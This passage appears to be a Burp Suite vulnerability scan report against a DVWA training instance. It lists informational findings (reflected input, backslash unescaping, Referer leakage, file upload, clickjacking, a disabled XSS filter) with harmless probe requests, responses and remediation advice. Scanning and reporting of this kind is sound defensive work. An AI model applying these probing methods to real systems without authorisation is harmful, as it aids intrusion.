Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 55
txtName=RUYsQw&mtxMessage=RUYsQwdycr8rxi1o&btnSign=Sign+Guestbook
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:41:39 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5032
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Stored Cross Site Scripting (XSS) :: Damn Vulnerable Web
...[SNIP]...
<br />Message: RUYsQwdycr8rxi1o<br />
...[SNIP]...
29.36. https://pentest-ground.com:4280/vulnerabilities/xss_s/ [security cookie]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_s/ |
Issue detail
The value of the security cookie is copied into the application's response.
Request 1
POST /vulnerabilities/xss_s/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low3m0hwwdykr; PHPSESSID=c5fb6727cef2632c9d9a075ed21a483b
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_s/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 55
txtName=RUYsQw&mtxMessage=RUYsQw&btnSign=Sign+Guestbook
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:44:08 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 6007
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<br />
<b>Warning</b>: Undefined array key "user_token" in <b>/var/www/html/vulnerabilities/xss_s/source/impossible.php</b> on line <b>5</b><br />
<br />
<b>Warning</b>: Cannot modify header informa
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=xss_s&security=low3m0hwwdykr&locale=en' )"> <input type="button" value="View Source" class="popup_button" id='source_button' data-source-url='../../vulnerabilities/view_source.php?id=xss_s&security=low3m0hwwdykr' )">
...[SNIP]...
29.37. https://pentest-ground.com:4280/vulnerabilities/xss_s/ [txtName parameter]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_s/ |
Issue detail
The value of the txtName request parameter is copied into the application's response.
Request 1
POST /vulnerabilities/xss_s/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=16ff6ee57a3573627a06d679b10aae63
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_s/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 55
txtName=RUYsQwwj1t4hvjj6&mtxMessage=RUYsQw&btnSign=Sign+Guestbook
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:40:05 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5032
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Stored Cross Site Scripting (XSS) :: Damn Vulnerable Web
...[SNIP]...
<div id="guestbook_comments">Name: RUYsQwwj1t4hvjj6<br />
...[SNIP]...
30. Suspicious input transformation (reflected)
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_s/ |
Issue detail
The application appears to unescape backslash escape sequences when processing the value of the mtxMessage request parameter, and echo the result in the response.
The payload 7dvjxcnn7m\\liduh93v9w was submitted in the mtxMessage parameter. This payload contains the '\\' sequence, which commonly represents an escaped backslash. The input was copied into the application's response as 7dvjxcnn7m\liduh93v9w indicating that the application unescaped the '\\' sequence as '\'.
This behavior indicates that the application might be evaluating the input within some interpreted context, which might give rise to code injection or other issues. It might also be possible to cause the application to differently interpret characters from the start of any data that is concatenated onto the input, by finishing the payload with a single backslash character.
Issue background
Suspicious input transformation arises when an application receives user input, transforms it in some way, and then performs further processing on the result. The types of transformations that can lead to problems include decoding common formats, such as UTF-8 and URL-encoding, or processing of escape sequences, such as backslash escaping.
Performing these input transformations does not constitute a vulnerability in its own right, but might lead to problems in conjunction with other application behaviors. An attacker might be able to bypass input filters by suitably encoding their payloads, if the input is decoded after the input filters have been applied. Or an attacker might be able to interfere with other data that is concatenated onto their input, by finishing their input with the start of a multi-character encoding or escape sequence, the transformation of which will consume the start of the following data.
Issue remediation
Review the transformation that is being applied, to understand whether this is intended and desirable behavior given the nature of the application functionality, and whether it gives rise to any vulnerabilities in relation to bypassing of input filters or character consumption.
References
Vulnerability classifications
Request 1
POST /vulnerabilities/xss_s/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=c5fb6727cef2632c9d9a075ed21a483b
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_s/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 55
txtName=RUYsQw&mtxMessage=7dvjxcnn7m%5c%5cliduh93v9w&btnSign=Sign+Guestbook
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:41:55 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4958
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Stored Cross Site Scripting (XSS) :: Damn Vulnerable Web
...[SNIP]...
<br />Message: 7dvjxcnn7m\liduh93v9w<br />
...[SNIP]...
31. Cross-domain Referer leakage
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/ |
Issue detail
The application contains links to the following other domains from URLs containing a query string:- bobby-tables.com
- en.wikipedia.org
- owasp.org
- www.acunetix.com
- www.netsparker.com
- contrib.rocks
- docs.docker.com
- cheatsheetseries.owasp.org
- cwe.mitre.org
- github.com
- mariadb.com
- nvd.nist.gov
- secure.php.net
- www.apachefriends.org
- www.docker.com
- www.gnu.org
- www.google.com
- www.howtogeek.com
- www.php.net
- www.ryadel.com
Numerous links to other domains were found and the above are a sample subset.
This issue was found in multiple locations under the reported path.
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behavior should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
Applications should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties. If placing sensitive information in the URL is unavoidable, consider using the Referer-Policy HTTP header to reduce the chance of it being disclosed to third parties.
References
Vulnerability classifications
Request 1
GET /vulnerabilities/sqli_blind/?id=294674&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=9f28fa18f337425afc9aa892e78d492e
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:32 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4179
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: SQL Injection (Blind) :: Damn Vulnerable Web Application
...[SNIP]...
<li><a href="https://bobby-tables.com/" target="_blank">https://bobby-tables.com/</a>
...[SNIP]...
Request 2
GET /vulnerabilities/sqli_blind/?id=294674&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=9f28fa18f337425afc9aa892e78d492e
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 2
HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:32 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4179
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: SQL Injection (Blind) :: Damn Vulnerable Web Application
...[SNIP]...
<li><a href="https://en.wikipedia.org/wiki/SQL_injection" target="_blank">https://en.wikipedia.org/wiki/SQL_injection</a>
...[SNIP]...
Request 3
GET /vulnerabilities/sqli_blind/?id=294674&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=9f28fa18f337425afc9aa892e78d492e
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 3
HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:32 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4179
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: SQL Injection (Blind) :: Damn Vulnerable Web Application
...[SNIP]...
<li><a href="https://owasp.org/www-community/attacks/Blind_SQL_Injection" target="_blank">https://owasp.org/www-community/attacks/Blind_SQL_Injection</a>
...[SNIP]...
32. Cross-domain script include
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/captcha/ |
Issue detail
The response dynamically includes the following script from another domain:- https://www.google.com/recaptcha/api.js
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should ideally not be included from untrusted domains. Applications that rely on static third-party scripts should consider using Subresource Integrity to make browsers verify them, or copying the contents of these scripts onto their own domain and including them from there. If that is not possible (e.g. for licensing reasons) then consider reimplementing the script's functionality within application code.
References
Vulnerability classifications
Request 1
GET /vulnerabilities/captcha/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=6673dce764fbffe20cb502b85dd01724
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:25 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4701
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Insecure CAPTCHA :: Damn Vulnerable Web Application (DVWA
...[SNIP]...
<br />
<script src='https://www.google.com/recaptcha/api.js'></script>
...[SNIP]...
33. File upload functionality
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/upload/ |
Issue detail
The page contains a form which is used to submit a user-supplied file to the following URL:- https://pentest-ground.com:4280/vulnerabilities/upload/
Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.
Issue background
File upload functionality is commonly associated with a number of vulnerabilities, including:
- File path traversal
- Persistent cross-site scripting
- Placing of other client-executable code into the domain
- Transmission of viruses and other malware
- Denial of service
You should review file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.
Some factors to consider when evaluating the security impact of this functionality include:
- Whether uploaded content can subsequently be downloaded via a URL within the application.
- What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
- Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
- Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
- Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
- What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
- Whether archive formats such as ZIP are unpacked by the application.
- How the application handles attempts to upload very large files, or decompression bomb files.
Issue remediation
File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:
- Use a server-generated filename if storing uploaded files on disk.
- Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
- Enforce a whitelist of accepted, non-executable file extensions.
- If uploaded files are downloaded by users, supply an accurate non-generic Content-Type header, the X-Content-Type-Options: nosniff header, and also a Content-Disposition header that specifies that browsers should handle the file as an attachment.
- Enforce a size limit on uploaded files (for defense-in-depth, this can be implemented both within application code and in the web server's configuration).
- Reject attempts to upload archive formats such as ZIP.
References
Vulnerability classifications
Request 1
POST /vulnerabilities/upload/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=30dfe41b65fb094cfbdac447e96119cd
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/upload/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryecNMX27PWG2QSiwV
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 401
------WebKitFormBoundaryecNMX27PWG2QSiwV
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
------WebKitFormBoundaryecNMX27PWG2QSiwV
Content-Disposition: form-data; name="uploaded"; fil
...[SNIP]...
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:13 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4050
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Upload :: Damn Vulnerable Web Application (DVWA)</ti
...[SNIP]...
<br />
<input name="uploaded" type="file" /><br />
...[SNIP]...
34. Frameable response (potential Clickjacking)
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/ |
Issue detail
This issue was found in multiple locations under the reported path.
Issue background
If a page fails to set an appropriate X-Frame-Options or Content-Security-Policy HTTP header, it might be possible for a page controlled by an attacker to load it within an iframe. This may enable a clickjacking attack, in which the attacker's page overlays the target application's interface with a different interface provided by the attacker. By inducing victim users to perform actions such as mouse clicks and keystrokes, the attacker can cause them to unwittingly carry out actions within the application that is being targeted. This technique allows the attacker to circumvent defenses against cross-site request forgery, and may result in unauthorized actions.
Note that some applications attempt to prevent these attacks from within the HTML page itself, using "framebusting" code. However, this type of defense is normally ineffective and can usually be circumvented by a skilled attacker.
You should determine whether any functions accessible within frameable pages can be used by application users to perform any sensitive actions within the application.
Issue remediation
To effectively prevent framing attacks, the application should return a response header with the name X-Frame-Options and the value DENY to prevent framing altogether, or the value SAMEORIGIN to allow framing only by pages on the same origin as the response itself. Note that the SAMEORIGIN header can be partially bypassed if the application itself can be made to frame untrusted websites.
References
Vulnerability classifications
Request 1
GET /vulnerabilities/sqli_blind/?id=294674&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=9f28fa18f337425afc9aa892e78d492e
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:32 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4179
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: SQL Injection (Blind) :: Damn Vulnerable Web Application
...[SNIP]...
Request 2
GET /vulnerabilities/fi/?page=file1.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=143c86fc083ce7d7f684f49dfdbc3c28
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:08 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4094
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)<
...[SNIP]...
Request 3
GET /vulnerabilities/xss_d/?default=Spanish HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d3b16130fb79125ad39c31a7a5f28589
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:18 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4612
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: DOM Based Cross Site Scripting (XSS) :: Damn Vulnerable W
...[SNIP]...
35. Browser cross-site scripting filter disabled
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_r/ |
Issue description
Some browsers, including Internet Explorer, contain built-in filters designed to protect against cross-site scripting (XSS) attacks. Applications can instruct browsers to disable this filter by setting the following response header:
X-XSS-Protection: 0
This behavior does not in itself constitute a vulnerability; in some cases XSS filters may themselves be leveraged to perform attacks against application users. However, in typical situations XSS filters do provide basic protection for application users against some XSS vulnerabilities in applications. The presence of this header should be reviewed to establish whether it affects the application's security posture.
Issue remediation
Review whether the application needs to disable XSS filters. In most cases you can gain the protection provided by XSS filters without the associated risks by using the following response header:
X-XSS-Protection: 1; mode=block
When this header is set, browsers that detect an XSS attack will simply render a blank page instead of attempting to sanitize the injected script. This behavior is considerably less likely to introduce new security issues.
References
Vulnerability classifications
Request 1
GET /vulnerabilities/xss_r/?name=YIQlvlCg HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=7ad36719161235c3db9c483f4194ef00
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_r/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:35 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4241
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 0
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Reflected Cross Site Scripting (XSS) :: Damn Vulnerable W
...[SNIP]...
36. Link manipulation (reflected)
Previous
Next
There are 2 instances of this issue:
Issue background
Link manipulation occurs when an application embeds user input into the path or domain of URLs that appear within application responses. An attacker can use this vulnerability to construct a link that, if visited by another application user, will modify the target of URLs within the response. It may be possible to leverage this to perform various attacks, such as:
- Manipulating the path of an on-site link that has sensitive parameters in the URL. If the response from the modified path contains references to off-site resources, then the sensitive data might be leaked to external domains via the Referer header.
- Manipulating the URL targeted by a form action, making the form submission have unintended side effects.
- Manipulating the URL used by a CSS import statement to point to an attacker-uploaded file, resulting in CSS injection.
- Injecting on-site links containing XSS exploits, thereby bypassing browser anti-XSS defenses, since those defenses typically do not operate on on-site links.
The security impact of this issue depends largely on the nature of the application functionality. Even if it has no direct impact on its own, an attacker may use it in conjunction with other vulnerabilities to escalate their overall severity.
Issue remediation
Consider using a whitelist to restrict user input to safe values. Please note that in some situations this issue will have no security impact, meaning no remediation is necessary.
References
Vulnerability classifications
36.1. https://pentest-ground.com:4280/security.php [name of an arbitrarily supplied URL parameter]
Previous
Next
Summary
